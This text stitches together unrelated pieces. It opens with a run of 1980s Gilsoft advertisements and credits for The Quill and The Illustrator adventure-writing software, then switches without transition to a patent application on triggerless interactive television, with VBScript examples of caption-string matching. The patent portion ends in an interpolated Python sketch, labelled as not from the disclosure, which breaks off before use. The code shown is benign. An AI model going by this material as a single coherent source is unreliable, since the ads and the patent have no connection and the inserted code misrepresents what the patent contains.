Using a menu selection system you may create up to 200 locations, describe them and connect routes between them. You may then fill them with objects and problems of your choice. Having tested your adventure you may alter and experiment with any section with the greatest of ease. A part formed adventure may be saved to tape for later completion. When you have done so the Quill will allow you to produce a copy of your adventure which will run independently of the main Quill editor, so that you may give copies away to your friends. The Quill is provided with a detailed tutorial manual which covers every aspect of its use in writing adventures.
It is impossible to describe all the features of this amazing program in such a small space, so we have produced a demonstration cassette which gives further information and an example of its use. This cassette is available at £2.00 and the Quill itself is £14.95.
ALSO NEW FOR THE 48K SPECTRUM:
DIAMOND TRAIL £4.95
The latest of our machine code adventures sets you the task of recovering the Sinclive diamond. But first you must overcome many problems in a city fraught with danger and intrigue.
GILSOFT
30 Hawthorn Road, Barry
South Glam CF6 8LE
Tel: (0446) 736369
TELEPHONE YOUR ORDER WITH
OUR SOFTWARE IS AVAILABLE FROM MANY COMPUTER SHOPS NATIONWIDE, OR DIRECT FROM US BY POST OR PHONE. S.A.E. FOR DETAILS. DEALER ENQUIRIES WELCOME. SOME OF OUR MAIN WHOLESALERS ARE:
UK: PCS Distribution, Darwen, Lancs. Tel (0254) 691211/2
HOLLAND/BELGIUM: AASHIMA TRADING BV, Hoostraat 69a, 3011 PH Rotterdam
SWEDEN: RIKO DATA, Box 2082, S 230 41 Bara, Sweden
DENMARK: QUALI-SOFT, Vesterbrogade 127 E Mz T, 1620 Copenhagen V
SOUTH AFRICA: UNIVERSAL SOURCES (PTY) LIMITED, Durban, Natal
ANNOUNCING
THE QUILL
FOR THE 48K SPECTRUM AT £14.95
The Quill is a major new utility written in machine code which allows even the
novice programmer to produce high speed machine code adventures of
superior quality to many available at the moment without any knowledge of
machine code whatsoever.
Using a menu selection system you may create well over 200 locations,
describe them and connect routes between them. You may then fill them
with objects and problems of your choice. Having tested your adventure you
may alter and experiment with any section with the greatest of ease. A part
formed adventure may be saved to tape for later completion. When you have
done so the Quill will allow you to produce a copy of your adventure which
will run independently of the main Quill editor, so that you may give copies
away to your friends. The Quill is provided with a detailed tutorial manual
which covers every aspect of its use in writing adventures. It is impossible to
describe all the features of this amazing program in such a small space, so we
have produced a demonstration cassette which gives further information and
an example of its use. This cassette is available at £2.00 and the Quill
itself is £14.95.
ALSO NEW FOR THE 48K SPECTRUM
MAGNETIC CASTLE (m/c 48K only) £4.95
A gripping adventure. Rescue the princess, but beware of booby traps and
vampires.
GAMES FOR THE 16K OR 48K SPECTRUM
MONGOOSE (m/c) and BEAR ISLAND £4.95
Fast and furious arcade action with three colourful high speed games.
REVERSAL (m/c) and POKER DICE £4.95
Classic strategy and addictive gambling games.
TIME-LINE (m/c) and TASKS £4.95
A superb 16K text adventure and a collection of mind stimulating puzzles.
3D MAZE OF GOLD (m/c) £5.95
Amazing full color, high resolution views as you walk around a large
labyrinth.
EXTENDED SPECTRUM BASIC
WITH
WHITE NOISE and GRAPHICS £5.95
A collection of Machine Code routines to add over 20 extra commands to
Basic. These give total control over the screen via a window which can be
scrolled in any of eight directions, inverted, cleared, bordered and shaded (thus
extending the normal range of colours). White Noise produces true
explosions, gunshot and other sound effects, includes many other routines.
Supplied with a comprehensive manual.
EDUCATIONAL TAPES
CESIL £5.95
If you are starting O level Computer studies this year you may well
be required to learn the CESIL language. So we have produced CESIL
interpreters for the ZX Spectrum, 16K ZX81 and Dragon 32 which will allow
you to write and run CESIL programs on your home computer thus gaining
a familiarity with the language that examinations require. Supplied with full
manual. Please specify machine type when ordering.
HAL £5.95
This is another O level language used in some areas and is available for the
ZX Spectrum only. Supplied with instructions.
VISUAL PROCESSOR £5.95
Provides an on screen display of a simple micro-processor showing its
internal operation as it runs programs. Full manual supplied. Available for the
ZX Spectrum Only.
WRITE YOUR OWN MACHINE CODE ADVENTURES WITH
THE QUILL
The Quill is a major new utility written in machine code which allows even the
novice programmer to produce high speed machine code adventures of
superior quality to many available at the moment without any knowledge of
machine code whatsoever.
Using a menu selection system you may create well over 200 locations,
describe them and connect routes between them. You may then fill them
with objects and problems of your choice. Having tested your adventure you
may alter and experiment with any section with the greatest of ease. A part
formed adventure may be saved to tape for later completion. When you have
done so The Quill will allow you to produce a copy of your adventure which
will run independently of the main Quill editor, so that you may give copies
away to your friends. The Quill is provided with a detailed tutorial manual
which covers every aspect of its use in writing adventures. It is impossible to
describe all the features of this amazing program in such a small space, so we
have produced a demonstration cassette which gives further information and
an example of its use. This cassette is available at
£2.00 and The Quill itself is £14.95.
FOR THE 48K SPECTRUM AT £14.95
Our Software is now available from many computer shops nationwide, or direct from us by post or phone. SAE for details. Dealer enquiries welcome.
GILSOFT
30 Hawthorne Road, Barry
South Glam CF6 8LE
Tel: (0446) 736369
THE QUILL
FOR THE 48K SPECTRUM AT £14.95
The Quill is a major new utility written in machine code which allows even the novice programmer to produce high speed machine code adventures of superior quality to many available at the moment without any knowledge of machine code whatsoever.
Using a menu selection system you may create well over 200 locations, describe them and connect routes between them. You may then fill them with objects and problems of your choice. Having saved your adventure you may alter and experiment with any section with the greatest of ease. A part formed adventure may be saved to tape for later completion. When you have done so The Quill will allow you to produce a copy of your adventure which will run independently of the main Quill editor, so that you may give copies away to your friends. The Quill is provided with a detailed tutorial manual which covers every aspect of its use in writing adventures.
We also have a range of machine code adventures which is growing constantly. Titles currently include:
TIMELINE & TASKS ........................................... £4.95
A superb 16K adventure in which you must locate a time machine to return to the present. Plus a collection of mind stimulating puzzles.
MAGIC CASTLE ........................................... £4.95
Try to rescue the princess from the castle, but beware of booby traps and vampires! A gripping adventure for the 48K Spectrum.
DIAMOND TRAIL ........................................... £4.95
Recover the Sinclair diamond after a daring robbery. First you must overcome many problems in a city fraught with danger and intrigue. This is our latest adventure for the 48K Spectrum.
GILSOFT wish MicroAdventurer every success and as a special launch offer, if you return the coupon below with your order you may purchase 'The Quill' at a special discount price of only £12.95. Please note that the offer closes on 30th November 1983.
Please rush me:—
<table>
<thead>
<tr>
<th>QTY</th>
<th>TITLE</th>
<th>PRICE</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>The Quill</td>
<td>12.95</td>
</tr>
<tr>
<td></td>
<td>Magic Castle</td>
<td>4.95</td>
</tr>
<tr>
<td></td>
<td>Diamond Trail</td>
<td>4.95</td>
</tr>
<tr>
<td></td>
<td>Timeline/Task</td>
<td>4.95</td>
</tr>
</tbody>
</table>
* I enclose a cheque/ Postal order payable to GILSOFT for £____________ or
* Please charge to my Access/ Barclaycard account
* Please delete as applicable.
No.
Signature
Name
Address
GILSOFT
30 Hawthorn Road, Barry
South Glam. CF6 8LE
Tel: (0446) 736369
http://8bitag.com/info
The Quill
Write your own machine code adventures
Without any knowledge of machine code whatsoever
FOR THE 48K SPECTRUM AT £14.95
Now available in larger branches of W. H. Smith, Boots, John Menzies and from many computer shops nationwide, or direct from us by post or telephone.
SAE for full details of our range.
Dealer enquiries welcome.
GILSOFT
30 Hawthorn Road
Barry
South Glamorgan
CF6 8LE
Tel (0446) 732765
The Illustrator
Now you can add graphics to your Quill Written Adventure.
For use in conjunction with The Quill Adventure Writing System on the 48K Spectrum.
Please rush me The Illustrator for the 48K Spectrum.
Name ...........................................
Address ...........................................
...........................................
SIGNATURE...........................................
Available late November 1984
I enclose a cheque / postal order for £14.95
Please debit my Access / VISA card no - - - - - - - - - - -
Send to:
GILSOFT
30 Hawthorn Road
Barry
South Glamorgan
CF6 8LE
From
GILSOFT
The Welsh Wizards of Adventure
THE QUILL
ADVENTURE WRITER
FOR THE
SPECTRUM 48K
AND
COMMODORE 64
48K SPECTRUM CASSETTE £14.95
COMMODORE 64 CASSETTE £14.95
COMMODORE 64 DISK £19.95
SELECTED TITLES AVAILABLE FROM
W.H. Smith, Boots, John Menzies, and from
Good Computer Shops Nationwide
Or Direct From Us
By Post or Telephone
GILSOFT
30 Hawthorn Road
Barry
South Glamorgan
☎ (0446) 732765
Credit Card Order Line 24 hour service ☎ : (0222) 41361 ext 430
---
The Quill
& The Illustrator
The Graphic Adventure Writing System
For The 48K Spectrum
The Quill £14.95
The Illustrator £14.95
GILSOFT
30, Hawthorn Road
Barry, South Glam
0446 - 732765
From Computer shops Nationwide
Or direct from us by post or phone
Credit Card Order Line Staffed 24 Hours Daily
0222 - 41361 Ext 430
http://8bitag.com/info
The Adventure Writing System
The Quill
Available For
- Spectrum 48K: £14.95
- CBM 64: £14.95
- Amstrad 464: £16.95
- Oric/Atmos: Coming Soon
The Illustrator
Available For
- Spectrum 48K: £14.95
- CBM 64: Coming Soon
- Amstrad 464: £16.95
GILSOFT
30, Hawthorn Road
Barry, South Glam
0446 - 732765
From Computer Shops Nationwide
Or Direct From Us By Post or Phone
Credit Card Order Line
Staffed 24 Hours Daily
0222 - 41361 Ext 430
The highly acclaimed
Graphic Adventure
Writing System
THE QUILL & ILLUSTRATOR
GILSOFT
INTERNATIONAL LTD
2 Park Crescent, Barry
S. Glam CF6 8HD.
Tel: 0446 732765
Now at a Bargain Price!
The Quill – £3.99
The Illustrator – £3.99
The Quill and Illustrator Twin Pack – £5.99
Available for The Spectrum,
CBM 64 and Amstrad CPC.
State which machine and add
50p p&p. Cheques/PO’s to:
Selected AdventureWriter advertising...
Wanted: Master of the Universe
- The job requires imagination - not programming.
- All the adventure games you ever dreamed of.
- Your story becomes a machine language adventure - automatically.
- The games are yours to trade or sell (great for schools).
- Hundreds of locations, objects & understood words possible in every game.
- For Commodore™, IBM™, Atari™, Apple™.
- Authors, teachers - ask about Dialog.
Call now for details:
1-800-621-4109 In Illinois 312-570-9700
CodeWriter
The world's leading supplier of program design software
7847 N. Caldwell Ave., Niles, IL 60648
Wanted: Master of the Universe
- The job requires imagination – not programming.
- All the adventure games you ever dreamed of.
- Your story becomes a machine language adventure – automatically.
- The games are yours to trade or sell (great for schools).
- Hundreds of locations, objects & understood words possible in every game.
- For Commodore™, IBM™, Atari™, Apple™.
- Authors, teachers – ask about Dialog.
Call now for details: 1-800-621-4109
In Illinois 312-470-5700
CodeWriter™
The world’s leading supplier of program design software.
7847 N. Caldwell Ave., Niles, IL 60648
http://8bitag.com/info
The Quill Credits
The Quill – originally created by Graeme Yeandle
Oric 1/ATMOS version by Tim Gilberts
BBC/Electron version by Neil Fleming-Smith
Sinclair QL version by Huw H.Powell
The Illustrator by Tim Gilberts
The Patch, The Press & The Expander by Phil Wade
Characters by Kevin Maddocks
Acknowledgements...
Information collated from original documentation and various other sources
(see links section)
Thanks also to...
Tim Gilberts
Stefan Vogt
Philip Richmond
Andy Ford, Anthony Hope & the members of the Stardot forums
Lionel Ange
---
Various technologies and techniques are disclosed that relate to providing interactive television by synchronizing content to live and/or recorded television shows. Content is synchronized without the use of in-band triggers. A broadcast stream is received, and search/action pairs are received from a transmission path, such as from the Internet or user. When the search criteria are found in the broadcast stream, the associated action is performed and the content is synchronized with the show. An application programming interface is used to facilitate synchronization, and includes a set search method, a search function template method, and a clear search method. The set search method initiates searching of the broadcast stream and registers one or more callback methods for performing the associated action when the match is found. The search function template serves as the template for registering the callback methods. The clear search method clears the system resources from the search.
START
RECEIVE AT LEAST ONE LIVE AND/OR RECORDED BROADCAST STREAM (AUDIO, VIDEO, DATA, ETC.)
RECEIVE A SET OF SEARCH/ACTION PAIR INSTRUCTIONS (E.G. IN HTML OR OTHER FILE, OR STRING) FROM A TRANSMISSION PATH (E.G. FROM INTERNET, USER INPUT, AND/OR FROM OTHER SOURCE)
PROCESS THE BROADCAST STREAM TO EXTRACT PORTIONS OF CONTENT (E.G. CLOSE CAPTION SUBSTREAM, SUBTITLE SUBSTREAM, ETC.)
DETERMINE THAT SEARCH CRITERIA (PARTICULAR STRING, AUDIO, VIDEO, ETC.) HAS BEEN FOUND/MATCHED (FULL OR PARTIAL) IN EXTRACTED CONTENT (E.G. USE SERIAL OR PARALLEL SEARCH)
INITIATE ASSOCIATED ACTION AND SYNCHRONIZE ACTION WITH SHOW BEING PLAYED (E.G. USE TIMESHIFTING)
FIG. 3
END
START
RECEIVE AT LEAST ONE LIVE AND/OR RECORDED BROADCAST STREAM (AUDIO, VIDEO, DATA, ETC.)
RECEIVE SEARCH PAGE (E.G. IN HTML OR OTHER FILE, ETC.) WITH SEARCH/ACTION PAIRS FROM A TRANSMISSION PATH (E.G. FROM INTERNET, USER INPUT, AND/OR FROM OTHER SOURCE)
BIND THE SEARCH PAGE TO AT LEAST ONE SEARCH OBJECT (E.G. CALL SEARCH PROGRAM AND CREATE SEARCH OBJECT)
FROM SEARCH OBJECT, REGISTER CALLBACK METHOD(S) SO METHODS IN SEARCH PAGE FOR ASSOCIATED ACTIONS CALLED WHEN MATCH FOUND
CALL CALLBACK METHOD TO PERFORM ASSOCIATED ACTION WHEN MATCH TO SEARCH CRITERIA FOUND IN BROADCAST STREAM
SYNCHRONIZE ASSOCIATED ACTION WITH SHOW
END
FIG. 4
FIG. 5 — Search class (260): +ClearSearch([in] dwCookie)
FIG. 6 — Search/action sequence: OnLoad (270) → SrchMary (272), Mary (274), ActMary (276) → SrchHad (278), Had (280), ActHad (282) → SrchLittle (284), Little (286), ActLittle (288) → SrchLamb (290), Lamb (292), ActLamb (294)
<HTML>
<!-- hooks events to web pages -->
<BODY OnLoad="Bind();">
<OBJECT ID="Binder" classID="clsid:12341235-1234-1234-1234-123412341234"></OBJECT>
<!-- control that does searching -->
<OBJECT ID="MCESearch" classID="CLSID:12341234-1234-1234-1234-123412341234">
<PARAM NAME="Param1" VALUE=100>
</OBJECT>
<SCRIPT language=vbscript>
// setup search callbacks
sub bind
varCCSearcher = Binder.Bind(MCECCSearch, "SearchEvent")
Endsub
sub window_onload
MCESearch.SetSearch("CC1","ActMary", "Mary", Once )
Endsub
sub ActMary(ccMatched, idSearch, timeStart, timeEnd)
<do something about Mary >
MCESearch.SetSearch("CC1", "ActHad", "Had", Once)
Endsub
sub ActHad(ccMatched, idSearch, timeStart, timeEnd)
<do something with Had>
MCESearch.SetSearch("CC1", "ActLittle", "Little", Once)
Endsub
sub ActLittle (ccMatched, idSearch, timeStart, timeEnd)
<do something Little>
MCESearch.SetSearch("CC1", "ActLamb", "Lamb", Once)
Endsub
sub ActLamb (ccMatched, idSearch, timeStart, timeEnd)
<do something wooly>
... Code to launch page for little lamb quiz ...
Endsub
</SCRIPT>
</BODY>
</HTML>
FIG. 7
<HTML>
<!-- hooks events to web pages -->
... same header as other example ...
<SCRIPT language=vbscript>
// setup search callbacks
sub bind
varCCSearcher = Binder.Bind(MCECCSearch, "SearchEvent")
endsub
sub window_onload
// terminate search if don't find it
cMary = MCESearch.SetSearch("CC1","ActLine1", "Mary", Once, 1 )
cHad = MCESearch.SetSearch("CC1","ActLine1", "Had", Once, 2 )
cLittle = MCESearch.SetSearch("CC1","ActLine1", "A Little", Once, 3 )
cLamb = MCESearch.SetSearch("CC1","DoneLine1", "Lamb", Once, 4 )
cTout1 = MCESearch.SetSearch("CC1","DoneLine1", "**", Once, 5, 5.0 )
endsub
sub ActLine1(ccMatched, idSearch, timeStart, timeEnd)
switch(ccMatch)
case 'Mary': < do something about Mary> break;
case 'Had': < do something about Had> break;
case 'A Little': <do something Little> break;
endswitch
endsub
sub DoneLine1(ccMatched, idSearch, timeStart, timeEnd)
ClearSearch(cMary); ClearSearch(cHad); ClearSearch(cLittle);
ClearSearch(cLamb); ClearSearch(cTout1);
if(ccMatch == 'Lamb')
<code to launch page for little lamb quiz >
endif
... do other lines ...
endsub
</SCRIPT>
</BODY>
</HTML>
FIG. 9
[Screen mockup: a TV window playing "The Mary Had A Little Lamb Show" alongside page 2, "QUIZ: Test Your Little Lamb Knowledge".]
TRIGGERLESS INTERACTIVE TELEVISION
BACKGROUND
[0001] The computer and television industries are making large strides in developing technology that combines the functionality of the computer and the television. For instance, the computer is becoming more adept at rendering audio and video data in a manner that simulates the broadcast infrastructure of the television industry. Likewise, the television and computer industries are making improvements in delivering interactive television content that tie web-based and/or other content to television broadcast content. One example of such interactive television includes displaying particular advertiser’s web page when their commercials are broadcast. Another example of interactive television includes displaying an interactive game that is in synchrony with the television broadcast.
[0002] In order to synchronize web-based and/or other content with television video content, the broadcaster must typically send triggers in-band with the video. Triggers are synchronization events and references to applications, typically web pages, that perform the actions. Examples of industry standards that support such triggers include the Advanced Television Enhancement Forum (ATVEF) standard and the Broadcast HTML standard. When using triggers in this fashion, some sort of back channel is typically required in order to send the actual web pages since the in-band channel is too narrow to send much content. Furthermore, in-band triggers require the broadcaster, which generates the web content and triggers, to work hand in hand with the head end side to get those triggers sent. This relationship between the broadcaster and head end has traditionally been problematic because, among other reasons, the television broadcasts have to be modified in order to include the required in-band triggers.
SUMMARY
[0003] Described herein are various technologies and techniques for providing interactive television by synchronizing content to television shows. In one aspect, content is synchronized without the use of in-band triggers. As one non-limiting example, a broadcast stream is received, such as a particular live or recorded television show. A set of search instructions are received from a transmission path, such as a web page downloaded over a separate transmission path such as the Internet and/or from search instructions entered by the user. The search instructions include a search criteria and one or more actions to be performed when that search criteria is found in a particular portion of the broadcast stream. When the search criteria are found in the broadcast stream, the associated one or more actions are performed and the content is synchronized with the show being played.
[0004] In another aspect, an application programming interface is provided to facilitate the synchronizing of content to television shows. The application programming interface includes a set search method, a search function template method, and a clear search method. The set search method initiates searching of a particular broadcast stream to locate the value (e.g., string, etc.) to match and registers one or more callback methods that should be called to perform a particular action when the match is found. The search function template serves as the template for registering the callback methods. The clear search method clears the system resources associated with the particular search.
[0005] This Summary is provided to introduce a selection of concepts in a simplified form that are further described below in the Detailed Description. This Summary is not intended to identify key features or essential features of the claimed subject matter, nor is it intended to be used as an aid in determining the scope of the claimed subject matter.
BRIEF DESCRIPTION OF THE DRAWINGS
[0006] FIG. 1 is a diagrammatic view of a computer system of one aspect of the present invention.
[0007] FIG. 2 is a diagrammatic view of a search program operating on the computer system of FIG. 1 in one aspect of the present invention.
[0008] FIG. 3 is a high-level process flow diagram for one aspect of the system of FIG. 1.
[0009] FIG. 4 is a process flow diagram for one aspect of the system of FIG. 1 illustrating the stages involved in synchronizing content with a show.
[0010] FIG. 5 is a class diagram for one aspect of the system of FIG. 1 illustrating the methods used in synchronizing content with a show.
[0011] FIG. 6 is a process flow diagram for one aspect of the system of FIG. 1 illustrating the stages involved in performing serial matching according to an illustrative example.
[0012] FIG. 7 is a diagram for one aspect of the system of FIG. 1 illustrating an HTML page with VBScript used for performing serial matching according to the illustrative example of FIG. 6.
[0013] FIG. 8 is a process flow diagram for one aspect of the system of FIG. 1 illustrating the stages involved in performing parallel matching according to an illustrative example.
[0014] FIG. 9 is a diagram for one aspect of the system of FIG. 1 illustrating an HTML page with VBScript used for performing parallel matching according to the illustrative example of FIG. 8.
[0015] FIG. 10 is a simulated screen for one aspect of the system of FIG. 1 that illustrates synchronizing content with a television show based on the hypothetical searches represented in FIGS. 6-9.
DETAILED DESCRIPTION
[0016] For the purposes of promoting an understanding of the principles of the invention, reference will now be made to the embodiments illustrated in the drawings and specific language will be used to describe the same. It will nevertheless be understood that no limitation of the scope of the invention is thereby intended. Any alterations and further modifications in the described embodiments, and any further applications of the principles of the invention as described herein are contemplated as would normally occur to one skilled in the art to which the invention relates.
[0017] There are various ways to synchronize web-based and/or other content with television video content. Typically,
the broadcaster sends triggers in-band with the video, such as using the ATVEF or Broadcast HTML standards. The broadcaster typically must modify the television broadcast to include the in-band triggers and must work hand in hand with the head end side to get those triggers sent. Various technologies and techniques are discussed herein that allow web-based and/or other content to be synchronized with video content without using in-band triggers and/or without modifying the television broadcast stream. The term broadcast stream used herein is meant to include live and/or recorded broadcast streams.
[0018] FIG. 1 illustrates an example of a suitable computing system environment 100 on which the invention may be implemented. The computing system environment 100 is only one example of a suitable computing environment and is not intended to suggest any limitation as to the scope of use or functionality of the invention. Neither should the computing environment 100 be interpreted as having any dependency or requirement relating to any one or combination of components illustrated in the exemplary operating environment 100.
[0019] The invention is operational with numerous other general purpose or special purpose computing system environments or configurations. Examples of well known computing systems, environments, and/or configurations that may be suitable for use with the invention include, but are not limited to, personal computers, server computers, handheld or laptop devices, multiprocessor systems, microprocessor-based systems, set top boxes, programmable consumer electronics, network PCs, minicomputers, mainframe computers, mobile telephones, PDAs, distributed computing environments that include any of the above systems or devices, and the like.
[0020] The invention may be described in the general context of computer-executable instructions, such as program modules, being executed by a computer. Generally, program modules include routines, programs, objects, components, data structures, etc. that perform particular tasks or implement particular abstract data types. The invention may also be practiced in distributed computing environments where tasks are performed by remote processing devices that are linked through a communications network. In a distributed computing environment, program modules may be located in both local and remote computer storage media including memory storage devices.
[0021] With reference to FIG. 1, an exemplary system for implementing the invention includes a general purpose computing device in the form of a computer 110. Components of computer 110 may include, but are not limited to, a processing unit 120, a system memory 130, and a system bus 121 that couples various system components including the system memory to the processing unit 120. The system bus 121 may be any of several types of bus structures including a memory bus or memory controller, a peripheral bus, and a local bus using any of a variety of bus architectures. By way of example, and not limitation, such architectures include Industry Standard Architecture (ISA) bus, Micro Channel Architecture (MCA) bus, Enhanced ISA (EISA) bus, Video Electronics Standards Association (VESA) local bus, and Peripheral Component Interconnect (PCI) bus also known as Mezzanine bus.
[0022] Computer 110 typically includes a variety of computer readable media. Computer readable media can be any available media that can be accessed by computer 110 and includes both volatile and nonvolatile media, removable and non-removable media. By way of example, and not limitation, computer readable media may comprise computer storage media and communication media. Computer storage media includes both volatile and nonvolatile, removable and non-removable media implemented in any method or technology for storage of information such as computer readable instructions, data structures, program modules or other data. Computer storage media includes, but is not limited to, RAM, ROM, EEPROM, flash memory or other memory technology, CD-ROM, digital versatile disks (DVD) or other optical disk storage, magnetic cassettes, magnetic tape, magnetic disk storage or other magnetic storage devices, or any other medium which can be used to store the desired information and which can be accessed by computer 110. Communication media typically embodies computer readable instructions, data structures, program modules or other data in a modulated data signal such as a carrier wave or other transport mechanism and includes any information delivery media. The term “modulated data signal” means a signal that has one or more of its characteristics set or changed in such a manner as to encode information in the signal. By way of example, and not limitation, communication media includes wired media such as a wired network or direct-wired connection, and wireless media such as acoustic, RF, infrared and other wireless media. Combinations of the any of the above should also be included within the scope of computer readable media.
[0023] The system memory 130 includes computer storage media in the form of volatile and/or nonvolatile memory such as read only memory (ROM) 131 and random access memory (RAM) 132. A basic input/output system (BIOS), containing the basic routines that help to transfer information between elements within computer 110, such as during start-up, is typically stored in ROM 131. RAM 132 typically contains data and/or program modules that are immediately accessible to and/or presently being operated on by processing unit 120. By way of example, and not limitation, FIG. 1 illustrates operating system 134, application programs 135, other program modules 136, and program data 137.
[0024] The computer 110 may also include other removable/non-removable, volatile/nonvolatile computer storage media. By way of example only, FIG. 1 illustrates a hard disk drive 141 that reads from or writes to non-removable, nonvolatile magnetic media, a magnetic disk drive 151 that reads from or writes to a removable, nonvolatile magnetic disk 152, and an optical disk drive 155 that reads from or writes to a removable, nonvolatile optical disk 156 such as a CD ROM or other optical media. Other removable/non-removable, volatile/nonvolatile computer storage media that can be used in the exemplary operating environment include, but are not limited to, magnetic tape cassettes, flash memory cards, digital versatile disks, digital video tape, solid state RAM, solid state ROM, and the like. The hard disk drive 141 is typically connected to the system bus 121 through a non-removable memory interface such as interface 140, and magnetic disk drive 151 and optical disk drive 155 are typically connected to the system bus 121 by a removable memory interface, such as interface 150.
[0025] The drives and their associated computer storage media discussed above and illustrated in FIG. 1, provide
storage of computer readable instructions, data structures, program modules and other data for the computer 110. In FIG. 1, for example, hard disk drive 141 is illustrated as storing operating system 144, application programs 145, other program modules 146, and program data 147. Note that these components can either be the same as or different from operating system 134, application programs 135, other program modules 136, and program data 137. Operating system 144, application programs 145, other program modules 146, and program data 147 are given different numbers here to illustrate that, at a minimum, they are different copies. A user may enter commands and information into the computer 110 through input devices such as a keyboard 162 and pointing device 161, commonly referred to as a mouse, trackball or touch pad. Other input devices (not shown) may include a microphone, joystick, game pad, satellite dish, scanner, or the like. These and other input devices are often connected to the processing unit 120 through a user input interface 160 that is coupled to the system bus, but may be connected by other interface and bus structures, such as a parallel port, game port or a universal serial bus (USB).
A monitor 191 or other type of display device is also connected to the system bus 121 via an interface, such as a video interface 190. Computer 110 may be integrally positioned with or separate from monitor 191. Monitor 191 may be configured to display items of different sizes and to display items in different colors. Examples of other suitable display devices include, but are not limited to, computer monitors, televisions, PDA displays, displays of other portable devices, and so forth. In addition to the monitor, computers may also include other peripheral output devices such as speakers 197 and printer 196, which may be connected through an output peripheral interface 190 and integrally positioned with or separate from computer 110. Non-limiting examples of speakers include computer speakers, stereo systems, amplifiers, radios, television audio systems, and so forth.
The computer 110 may operate in a networked environment using logical connections to one or more remote computers, such as a remote computer 180. The remote computer 180 may be a personal computer, a server, a router, a network PC, a peer device, or other common network node, and typically includes many or all of the elements described above relative to the computer 110, although only a memory storage device 181 has been illustrated in FIG. 1. In one embodiment, the remote computer 180 may include a TV broadcast station, a cable broadcast station, and/or a satellite transmission system. The broadcast signals transmitted between the computer 110 and the remote computer 180 may include analog and digital signals that are transmitted over any suitable communication link. The logical connections depicted in FIG. 1 include a local area network (LAN) 171 and a wide area network (WAN) 173, but may also include other networks. Such networking environments are commonplace in offices, enterprise-wide computer networks, intranets and the Internet.
When used in a LAN networking environment, the computer 110 is connected to the LAN 171 through a network interface or adapter 170. When used in a WAN networking environment, the computer 110 typically includes a modem 172 or other means for establishing communications over the WAN 173, such as the Internet. The modem 172, which may be internal or external, may be connected to the system bus 121 via the user input interface 160, or other appropriate mechanism. In a networked environment, program modules depicted relative to the computer 110, or portions thereof, may be stored in the remote memory storage device. By way of example, and not limitation, FIG. 1 illustrates remote application programs 185 as residing on memory device 181. It will be appreciated that the network connections shown are exemplary and other means of establishing a communications link between the computers may be used.
Turning now to FIG. 2 with continued reference to FIG. 1, a search program 200 operating on computer 110 in one aspect of the present invention is illustrated. In the example illustrated on FIG. 2, search program 200 is one of application programs 145 that reside on computer 110. Alternatively or additionally, one or more parts of search program 200 can be part of application programs 135 in RAM 132, or remote computer 180 with remote application programs 185, or other such variations as would occur to one in the computer software art.
Search program 200 includes business logic 202. Business logic 202 is responsible for carrying out some or all of the techniques described herein. Business logic includes logic for retrieving search instructions 204 that were received from a transmission path, such as one separate from a broadcast stream and logic for processing the broadcast stream to look for search criteria and determine a match 206. Business logic 202 also includes logic for registering one or more callback methods so one or more actions can be performed when a match is determined 208. Business logic 202 of search program 200 also includes logic for deleting system resources used in the search 210. In FIG. 2, business logic 202 is shown to reside on computer 110 as part of application programs 145. However, it will be understood that business logic 202 can alternatively or additionally be embodied as computer-executable instructions on one or more computers and/or in different variations than shown on FIG. 2. As one non-limiting example, one or more parts of business logic 202 could alternatively or additionally be implemented as an XML web service that resides on an external computer that is called when needed.
Also shown on FIG. 2 are search instructions 212 that were received from a transmission path, such as one separate from the broadcast stream. Search instructions 212 contain one or more sets of search/action pairs 214. As one non-limiting example, search instructions 212 are contained in a web page that communicates with search program 200. Each search/action pair 214 includes search criteria 216 and one or more actions 218 to be performed when the particular search criteria 216 is found in the broadcast stream. Search instructions 212 are retrieved by business logic 204. Search criteria 216 are used by business logic 206 as the search criteria to look for in the broadcast stream. Business logic 208 registers callback methods for the actions 218 so that the actions 218 are performed when the search criteria is matched with the broadcast stream.
Turning now to FIGS. 3-4 with continued reference to FIGS. 1-2, the stages for implementing one or more aspects of search program 200 of system 100 are described in further detail. FIG. 3 is a high-level process flow diagram of one aspect of the current invention. In one form, the process of FIG. 3 is at least partially implemented in the
operating logic of system 100. The process begins at start point 220 with receiving at least one broadcast stream, such as audio, video, emergency alerts, time, weather, and/or data (stage 222). One or more search/action pair instructions are received from a transmission path, such as one separate from the broadcast stream (stage 224). As a few non-limiting examples, search/action pairs can be contained in an HTML file or other file that was downloaded over an Internet connection. For example, a guide entry for the show can contain a URL that specifies where the initial web page containing the search/action pairs can be retrieved. As another example, the user could select the start page with the search/action pairs by navigating to that page in a web browser or by some other selection means. As yet a further non-limiting example, the initial start page and/or the search/action pairs can be generated programmatically or manually based on criteria entered by the user, such as criteria indicating the user wishes to start recording the show on the programmable video recorder (PVR) when the search string “John Doe” comes on. Finally, the initial start page containing search/action pairs can be retrieved or generated from various other sources.
[0033] The broadcast stream is processed by search program 200 to extract portions of content from the stream (stage 226). As a few non-limiting examples, portions of content extracted from the stream can include string values retrieved from a close caption and/or subtitle stream. Portions of content can alternatively or additionally be extracted from another text stream, an audio stream, or a video stream, from an emergency alert stream, from a time stream, from a weather stream, and/or from other streams. As one non-limiting example, a particular frame or frames of video might be matched before kicking off a certain action. Numerous other text and non-text variations of searches are also possible.
[0034] When search program 200 determines that the search criteria 216 has been found in the extracted content (stage 228) based on a full or partial match as applicable, the one or more actions 218 associated with the search criteria 216 are initiated and the result of the one or more actions is synchronized with the show being played (stage 230). Some non-limiting examples of actions include initiating another search, opening a particular web page, launching an external program, beginning recording on a PVR device, skipping a scene (such as a commercial) after a certain time period, muting a commercial, tracking the number of times a show is watched for data collection purposes, and/or transcribing the close caption stream and writing the text to file or Braille output. Nearly anything that can be initiated programmatically using computer 110 can be included as part or all of an action. One non-limiting example of synchronization includes using timeshifting to delay playback of the show from its broadcast time and perform the result of the action at a time that appears before the action was actually initiated. The process then ends at end point 232.
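As a further non-limiting illustration (not code from the disclosure), the extract-match-act flow of stages 226-230 can be sketched as follows; the function name, the list-of-pairs representation, and the use of regular expressions over caption strings are assumptions made only for this sketch:

```python
import re

def run_search(caption_stream, search_action_pairs):
    """Scan extracted portions of a stream; fire the paired action on each match.

    Hypothetical sketch of stages 226 (extract), 228 (match), and 230 (act)."""
    results = []
    for portion in caption_stream:                    # stage 226: extracted content
        for criteria, action in search_action_pairs:  # stage 228: look for criteria
            if re.search(criteria, portion):
                results.append(action(portion))       # stage 230: perform the action
    return results

# Usage: a match on "little lamb" stands in for launching the quiz page.
stream = ["Mary had", "a little lamb", "its fleece was white"]
pairs = [("little lamb", lambda text: "launch quiz page")]
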